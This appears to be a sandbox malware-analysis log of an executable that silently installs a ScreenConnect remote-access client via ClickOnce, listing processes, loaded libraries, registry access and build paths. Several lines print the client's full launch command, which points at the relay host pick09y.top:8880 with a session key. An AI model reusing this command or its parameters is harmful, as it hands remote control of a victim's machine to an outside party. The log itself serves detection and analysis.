                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Code function: 0_2_00F51000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F51000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Deployment
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Mutant created: NULL
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                  Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5856
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe File created: C:\Users\user\AppData\Local\Temp\Deployment
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Command line argument: dfshim 0_2_00F51000
                  Source: pzPO97QouM.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknown Process created: C:\Users\user\Desktop\pzPO97QouM.exe "C:\Users\user\Desktop\pzPO97QouM.exe"
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                  Source: unknown Process created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=pick09y.top&p=8880&s=ff0619b3-cdda-4e74-9760-149d39b5b1c0&k=BgIAAACkAABSU0ExAAgAAAEAAQDdgAKam2Sc4a%2b0vjsNximnzOEX5MKRna0gdqvTZFUYhUi4mxfaIer02WcIARvbkQtcBocnZY6cOhwLXqtjbXCHK5V9NClpcJ0VsmVQ5Ngzm5KWTJOIRLp48Nx7xw8h5tMlI69ZhW7bDoTif1%2bzod8%2bP9ttRfgxJhBbSeiBlGI17JX%2ffgLdQYfBxWOvwJYUSFApm2B6yeRofjh%2b%2fClLGayEdlBZ3CJwK2rKMq6rxdojaIGyxzfrBIlRifETmHax7zLC%2fb3uiIEpoX2rWmOZFQlj%2bubOBd89yKN0uBh3aLVd%2b8orlqSpyEBCOK4rG%2fOuOyVEiCOkqxdA0LWuzW70luvi&r=&i=Untitled%20Session" "1"
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7c199985-91b6-43e6-a992-7121e466b299" "User"
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 5856 -ip 5856
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 316
                  Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Process created: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe" "RunRole" "7595e846-2dc4-4314-8d6a-fc819222a16f" "System"
                  Source: C:\Windows\System32\svchost.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5856 -s 316
                  Source: C:\Windows\SysWOW64\WerFault.exe Process created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: wtsapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: winsta.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exe Section loaded: wersvc.dll, windowsperformancerecordercontrol.dll, weretw.dll, xmllite.dll, wldp.dll, wer.dll, policymanager.dll, msvcp110_win.dll, faultrep.dll, dbghelp.dll, dbgcore.dll, userenv.dll, profapi.dll, sspicli.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, profapi.dll, amsi.dll, userenv.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, propsys.dll, windowscodecs.dll
                  Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll, wlidsvc.dll, ncrypt.dll, cryptsp.dll, profapi.dll, clipc.dll, dpapi.dll, ntasn1.dll, wldp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, msxml6.dll, msasn1.dll, winhttp.dll, netprofm.dll, iphlpapi.dll, policymanager.dll, msvcp110_win.dll, wtsapi32.dll, winsta.dll, gamestreamingext.dll, msauserext.dll, tbs.dll, npmproxy.dll, ondemandconnroutehelper.dll, sspicli.dll, dhcpcsvc6.dll, dhcpcsvc.dll, webio.dll, mswsock.dll, winnsi.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, gpapi.dll, cryptnet.dll, ncryptsslp.dll, cryptngc.dll, devobj.dll, ncryptprov.dll, elscore.dll, elstrans.dll
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Section loaded: mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, profapi.dll, amsi.dll, userenv.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, sspicli.dll, propsys.dll, ntmarta.dll, windowscodecs.dll, wtsapi32.dll, winsta.dll, wbemcomn.dll, netapi32.dll, wkscli.dll
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020420-0000-0000-C000-000000000046}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
                  Source: Window Recorder Window detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                  Source: pzPO97QouM.exe Static PE information: certificate valid
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: pzPO97QouM.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: pzPO97QouM.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350023B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472594862.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: pzPO97QouM.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3886946834.0000023500237000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350075D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2462747546.0000000004A12000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3888780873.0000000002281000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529477567.00000000009B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000E.00000002.2529707032.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000006.00000000.2458689321.000000000008D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350060E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.0000023500253000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2474166019.000000001C012000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000005.00000000.2453484007.0000000000DD2000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350060E000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.0000023500253000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2474166019.000000001C012000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.000002350023B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000005.00000002.2472594862.0000000002F22000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3886946834.0000023500081000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3886946834.00000235004AF000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000006.00000002.2462868370.0000000004AC2000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: pzPO97QouM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                  Source: pzPO97QouM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                  Source: pzPO97QouM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                  Source: pzPO97QouM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                  Source: pzPO97QouM.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                  Source: ScreenConnect.Client.dll.1.dr Static PE information: 0xB8CD3C5A [Sat Mar 31 22:21:14 2068 UTC]
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Code function: 0_2_00F51000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F51000
                  Source: pzPO97QouM.exe Static PE information: real checksum: 0x1bda6 should be: 0x1a4ee
                  Source: C:\Users\user\Desktop\pzPO97QouM.exe Code function: 0_2_00F51BC0 push ecx; ret 0_2_00F51BD3
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF848E0D2A5 pushad ; iretd 1_2_00007FF848E0D2A6
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF848F25FE8 pushfd ; ret 1_2_00007FF848F662E1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF848F200BD pushad ; iretd 1_2_00007FF848F200C1
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF848F32157 push ebx; retf 1_2_00007FF848F3215A
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe Code function: 1_2_00007FF848F2842D push eax; ret 1_2_00007FF848F2846D
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 5_2_00007FF848F04162 push eax; ret 5_2_00007FF848F04163
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 5_2_00007FF848F02D68 push eax; ret 5_2_00007FF848F02E7B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 5_2_00007FF848F02FDA pushad ; retf 5_2_00007FF848F02FDB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 5_2_00007FF848F03F3A pushad ; retf 5_2_00007FF848F03F3B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 5_2_00007FF848F030BA push eax; iretd 5_2_00007FF848F030BB
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.WindowsClient.exe Code function: 5_2_00007FF848F0401A push eax; iretd 5_2_00007FF848F0401B
                  Source: C:\Users\user\AppData\Local\Apps\2.0\C33T3YQG.MWR\BE27GN6Q.Q10\scre..tion_25b0fbb6ef7eb094_0018.0002_6806a0097a04f881\ScreenConnect.ClientService.exe Code function: 6_2_00B618B1 push 4C024533h; retf 6_2_00B618BD
